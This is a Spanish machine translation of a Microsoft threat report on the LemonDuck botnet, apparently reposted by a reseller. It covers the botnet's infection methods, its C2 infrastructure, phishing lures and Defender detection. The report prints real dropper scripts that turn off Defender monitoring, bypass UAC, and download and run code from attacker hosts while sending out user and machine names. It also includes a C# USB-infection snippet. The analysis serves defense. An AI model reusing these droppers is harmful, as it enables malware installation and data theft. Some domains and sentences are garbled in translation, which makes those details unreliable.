La lucha contra las amenazas actuales a las empresas y su prevención requieren una protección integral centrada en abordar todo el alcance y el impacto de los ataques. Cualquier cosa que puedaobtener acceso a lasmáquinas, incluso el llamado malware de productos básicos, puede generar amenazas más peligrosas. Hemos visto esto en troyanos bancarios que sirven como punto de entrada para ataques de ransomware y manos en el teclado. LemonDuck, un malware actualizado activamente y robusto que es conocido principalmente por sus objetivos de minería de bots y criptomonedas, siguió la misma trayectoria cuando adoptó un comportamiento más sofisticado y escaló sus operaciones. Hoy en día, más allá de usar recursos para sus actividades tradicionales de bots y minería, LemonDuck roba credenciales, elimina los controles de seguridad, se propaga a través de correos electrónicos, se mueve lateralmente y, en última instancia, deja caer más herramientas para la actividad operada por humanos.
La amenaza de LemonDuck a las empresas también está en el hecho de que es una amenaza multiplataforma. Es una de las pocas familias de malware bot documentadas que se dirige a los sistemas Linux, así como a los dispositivos Windows. Utiliza una amplia gama de mecanismosde difusión: correos electrónicos de phishing, exploits, dispositivos USB, fuerza bruta, entre otros,y ha demostrado que puede aprovechar rápidamente noticias, eventos o el lanzamiento de nuevos exploits para ejecutar campañas efectivas. Por ejemplo, en 2020, se observó el uso de señuelos con temática COVID-19 en ataques por correo electrónico. En 2021, explotó las vulnerabilidades de Exchange Server recién parcheadas para obtener acceso a sistemas obsoletos.
Esta amenaza, sin embargo, no se limita a vulnerabilidades nuevas o populares. Continúa utilizando vulnerabilidades más antiguas, que benefician a los atacantes en momentos en que el enfoque cambia a parchear una vulnerabilidad popular en lugar de investigar el compromiso. En particular, LemonDuck elimina a otros atacantes de un dispositivo comprometido al deshacerse del malware de la competencia y prevenir nuevas infecciones mediante parches de las mismas vulnerabilidades que utilizó para obtener acceso.
En los primeros años, LemonDuck se dirigió fuertemente a China, pero sus operaciones se han expandido desde entonces para incluir a muchos otros países, centrándose en los sectores de fabricación e IoT. Hoy en día, LemonDuck impacta en un rango geográfico muy grande, con los Estados Unidos, Rusia, China, Alemania, el Reino Unido, India, Corea, Canadá, Francia y Vietnam viendo la mayoría de los encuentros.
Figura 1. Distribución global de la actividad de la red de bots LemonDuck
En 2021, las campañas de LemonDuck comenzaron a utilizar una infraestructura y herramientas de comando y control (C2) más diversificadas. Esta actualización apoyó el marcado aumento en las acciones de manos en el teclado después de la violación, que variaba dependiendo del valor percibido de los dispositivos comprometidos para los atacantes. A pesar de todas estas actualizaciones, sin embargo, LemonDuck todavía utiliza C2s, funciones, estructuras de script y nombres de variables durante mucho más tiempo que el malware promedio. Esto es probablemente debido a su uso de proveedores de alojamiento a prueba de balas como Epik Holdings, que es poco probable que tome cualquier parte de la infraestructura lemonduck fuera de línea, incluso cuando se informa de acciones maliciosas, lo que permite LemonDuck persistir y seguir siendo una amenaza.
La investigación en profundidad de las infraestructuras de malware de varios tamaños y operaciones proporciona información valiosa sobre la amplitud de las amenazas a las que se enfrentan las organizaciones hoy en día. En el caso de LemonDuck, la amenaza es multiplataforma, persistente y en constante evolución. Investigaciones como esta enfatizan la importancia de tener una visibilidad completa de la amplia gama de amenazas, así como la capacidad de correlacionar actividades simples y dispares como la minería de monedas con ataques adversarios más peligrosos.
Infraestructura de LemonDuck y LemonCat
La documentación más antigua de LemonDuck fue de sus campañas de criptomonedas en mayo de 2019. Estas campañas incluían scripts de PowerShell que empleaban scripts adicionales iniciados por una tarea programada. La tarea se utilizó para traer la herramienta PCASTLE para lograr un par de objetivos: abusar de la explotación EternalBlue SMB, así como usar la fuerza bruta o pasar el hash para moverse lateralmente y comenzar la operación de nuevo. Muchos de estos comportamientos todavía se observan en las campañas de LemondDuck hoy en día.
LemonDuck lleva el nombre de la variable «Lemon_Duck» en uno de los scripts de PowerShell mencionados. La variable se utiliza a menudo como agente de usuario, junto con los números asignados, para los dispositivos infectados. El formato usaba dos conjuntos de caracteres alfabéticos separados por guiones, por ejemplo: «User-Agent: Lemon-Duck-[A-Z]-[A-Z]». El término todavía aparece en los scripts de PowerShell, así como en muchos de los scripts de ejecución, específicamente en una función llamada SIEX, que se usa para asignar un agente de usuario único durante la conexión a botnets en ataques tan recientemente como junio de 2021.
LemonDuck utiliza con frecuencia material de código abierto construido a partir de recursos también utilizados por otras redes de bots, por lo que hay muchos componentes de esta amenaza que parecen familiares. Los investigadores de Microsoft son conscientes de dos estructuras operativas distintas, que ambos utilizan el malware LemonDuck pero son potencialmente operados por dos entidades diferentes para objetivos separados.
La primera, que llamamos la infraestructura «Pato», utiliza infraestructuras históricas discutidas en este informe. Es muy consistente en la ejecución de campañas y realiza actividades de seguimiento limitadas. Esta infraestructura rara vez se ve junto con el compromiso del dispositivo de borde como un método de infección, y es más probable que tenga nombres para mostrar aleatorios para sus sitios C2, y siempre se observa utilizando «Lemon_Duck» explícitamente en el script.
La segunda infraestructura, a la quellamamos infraestructura «Cat», por usar principalmente dos dominios con la palabra «cat» en ellos (sqlnetcat[.] com, netcatkit[.] com)—surgió en enero de 2021. Se utilizó en ataques explotando vulnerabilidades en Microsoft Exchange Server. Hoy en día, la infraestructura Cat se utiliza en ataques que normalmente resultan en la instalación de puerta trasera, el robo de credenciales y datos, y la entrega de malware. A menudo se ve la entrega del malware Ramnit.
| Ejemplos de dominios Duck | Dominios Cat de ejemplo |
| cdnimages[.] Xyzbb3u9[.] conzz3r0[.] conpp6r1[.] conamynx[.] conackng[.] conhwqloan[.] conjs88[.] enzer9g[.] conb69kq[.] con | sqlnetcat[.] connetcatkit[.] conabajo[.] sqlnetcat[.] COM |
Las infraestructuras Duck y Cat usan subdominios similares y usan los mismos nombres de tarea, como «blackball». Ambas infraestructuras también utilizan los mismos componentes empaquetados alojados en sitios similares o idénticos para sus scripts de minería, movimiento lateral y eliminación de competencia, así como muchas de las mismas llamadas de función.
El hecho de que la infraestructura cat se utiliza para campañas más peligrosas no despriorizar las infecciones de malware de la infraestructura duck. En cambio, esta inteligencia agrega un contexto importante para comprender esta amenaza: el mismo conjunto de herramientas, acceso y métodos se puede volver a utilizar a intervalos dinámicos, con un mayor impacto. A pesar de las implicaciones comunes de que los mineros criptomoneda son menos amenazantes que otros programas maliciosos, su funcionalidad principal refleja el software no monetizado, por lo que cualquier infección botnet digno de priorización.
Figura 2. Cadena de ataque LemonDuck de las infraestructuras Duck y Cat
Acceso inicial
LemonDuck se propaga en una variedad de formas, pero los dos métodos principales son (1) compromisos que son iniciados por el borde o facilitados por implantes de bot que se mueven lateralmente dentro de una organización, o (2) campañas de correo electrónico iniciadas por bots.
LemonDuck actúa como un cargador para muchas otras actividades de seguimiento, pero una si sus funciones principales es propagarse comprometiendo otros sistemas. Desde su primera aparición, los operadores de LemonDuck han aprovechado los análisis contra dispositivos Windows y Linux para SMB, Exchange, SQL, Hadoop, REDIS, RDP u otros dispositivos perimetrales abiertos o débilmente autenticados que podrían ser vulnerables al rociado de contraseñas o vulnerabilidades de aplicaciones como CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon) y CVE-2021-27065 (ProxyLogon).
Una vez dentro de un sistema con un buzón de Outlook, como parte de su comportamiento de explotación normal, LemonDuck intenta ejecutar un script que utiliza las credenciales presentes en el dispositivo. El script indica al buzón que envíe copias de un mensaje de suplantación de identidad (phishing) con mensajes y datos adjuntos preestablecidos a todos los contactos.
Debido a este método de mensajería de contacto, no se aplican los controles de seguridad que se basan en determinar si un correo electrónico se envía desde un remitente sospechoso. Esto significa que las políticas de seguridad de correo electrónico que reducen el escaneo o la cobertura del correo interno deben volver a evaluarse, ya que el envío de correos electrónicos a través del raspado de contactos es muy efectivo para evitar los controles de correo electrónico.
Desde mediados de 2020 hasta marzo de 2021, los temas de correo electrónico y el contenido del cuerpo de LemonDuck se han mantenido estáticos, al igual que los nombres y formatos de los archivos adjuntos. Estos nombres y formatos de archivos adjuntos han cambiado muy poco con respecto a campañas similares que ocurrieron a principios de 2020.
| Asuntos de correo electrónico de ejemplo | Ejemplo de contenido del cuerpo del correo electrónico |
| La verdad del COVID-19COVID-19 nCov Información especial OMSAVISO DE HALTH:CORONAVIRUSWtfLo que el fcukAdióscarta de despedidaarchivo roto¿Esta es su orden? | El virus en realidad proviene de los Estados Unidos de Américainformación muy importante para el Covid-19consulte el documento adjunto para su acción y discreción.el brote de CORONAVIRUS es motivo de preocupación, especialmente cuando el personal de forign ha llegado recientemente o llegará a varios intt en un futuro próximo.¿qué te pasa?¿estás fuera de tu mente!!!!!¿estás fuera de tu mente!!!!! ¿qué te pasa?ad ad siéndolo, mantente en contactome puedes ayudar a arreglar el archivo,no puedo leerloel archivo está roto, no puedo abrirlo |
El archivo adjunto utilizado para estos señuelos es uno de tres tipos: .doc, .js o un .zip que contiene un archivo de .js. Sea cual sea el tipo, el archivo se denomina «Léame». En ocasiones, los tres tipos están presentes en el mismo correo electrónico.
Figura 3. Correo electrónico de ejemplo
Aunque muchos proveedores de seguridad detectan javascript, es posible que se clasifique con nombres de detección genéricos. Podría ser valioso para las organizaciones desinfectar JavaScript o VBScript ejecutando o llamando a mensajes (como PowerShell) directamente desde descargas de correo a través de soluciones como reglas de detección personalizadas.
Desde que LemonDuck comenzó a funcionar, el .zip a .js método de ejecución de archivos es el más común. JavaScript ha reemplazado la tarea programada que LemonDuck usó anteriormente para iniciar el script de PowerShell.The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. Este script de PowerShell se ha visto muy similar a lo largo de 2020 y 2021, con cambios menores dependiendo de la versión, lo que indica un desarrollo continuo. A continuación se muestra una comparación de los cambios de las iteraciones más recientes de las descargas entregadas por correo electrónico y las de abril de 2020.
| Script de PowerShell de abril de 2020 | Script de PowerShell de marzo de 2021 |
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo | var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')";cmd.run(cmdstr,0,1); |
Después de enviar los correos electrónicos, la bandeja de entrada se limpia para eliminar los rastros de estos correos. Este método de autodisparcimiento se intenta en cualquier dispositivo afectado que tenga un buzón, independientemente de si se trata de un servidor de Exchange.
Otros métodos comunes de infección incluyen el movimiento dentro del entorno comprometido, así como a través de USB y unidades conectadas. Estos procesos a menudo se inician automáticamente y han ocurrido consistentemente a lo largo de la totalidad de la operación de LemonDuck.
Estos métodos se ejecutan como una serie de scripts de C# que reúnen las unidades disponibles para la infección. También crean una lista en ejecución de unidades que ya están infectadas en función de si encuentra la amenaza ya instalada. Una vez comprobados con la lista en ejecución de unidades infectadas, estos scripts intentan crear un conjunto de archivos ocultos en el directorio de inicio, incluida una copia del archivo Léame.js. Cualquier dispositivo que ha sido afectado por los implantes LemonDuck en cualquier momento podría haber tenido cualquier número de unidades conectadas a él que se ven comprometidas de esta manera. Esto hace que este comportamiento sea un posible vector de entrada para ataques adicionales.
DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
{
if (blacklist.Contains(drive.Name))
{ continue;}
Console.WriteLine("Detect drive:"+drive.Name);
if (IsSupported(drive))
{
if (!File.Exists(drive + home + inf_data))
{
Console.WriteLine("Try to infect "+drive.Name);
if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
{
blacklist.Add(drive.Name);
}
}
else {
Console.WriteLine(drive.Name+" already infected!");
blacklist.Add(drive.Name);
}
}
else{
blacklist.Add(drive.Name);
Protección integral contra una operación de malware de gran alcance
La visibilidad entre dominios y la defensa coordinada entregada por Microsoft 365 defensor está diseñado para la amplia gama y la creciente sofisticación de las amenazas que LemonDuck ejemplifica. Microsoft 365 Defender tiene protecciones líderes en la industria impulsadas por IA que pueden detener amenazas de múltiples componentes como LemonDuck en dominios y plataformas. Microsoft 365 Defensor de Oficina 365 detecta los correos electrónicos maliciosos enviados por la botnet LemonDuck para entregar cargas útiles de malware, así como propagar el cargador de bots. Microsoft Defender for Endpoint detecta y bloquea los implantes, las cargas útiles y la actividad malintencionada de LemonDuck en Linux y Windows.
Más importante aún, Microsoft 365 Defender proporciona herramientas de investigación enriquecidas que pueden exponer detecciones de actividad de LemonDuck, incluidos los intentos de comprometer y hacerse un hueco en la red, para que los equipos de operaciones de seguridad puedan responder y resolver estos ataques de manera eficiente y segura. Microsoft 365 Defender correlaciona las señales multiplataforma y entre dominios para pintar la cadena de ataque de extremo a extremo, lo que permite a las organizaciones ver el impacto total de un ataque. También publicamos un artículo de análisis de amenazas sobre esta amenaza. Microsoft 365 Los clientes de Defender pueden usar este informe para obtener detalles técnicos importantes, orientación para la investigación, incidentes consolidados y pasos para mitigar esta amenaza en particular y los ciberataques modernos en general.
CADE SOLUCIONES 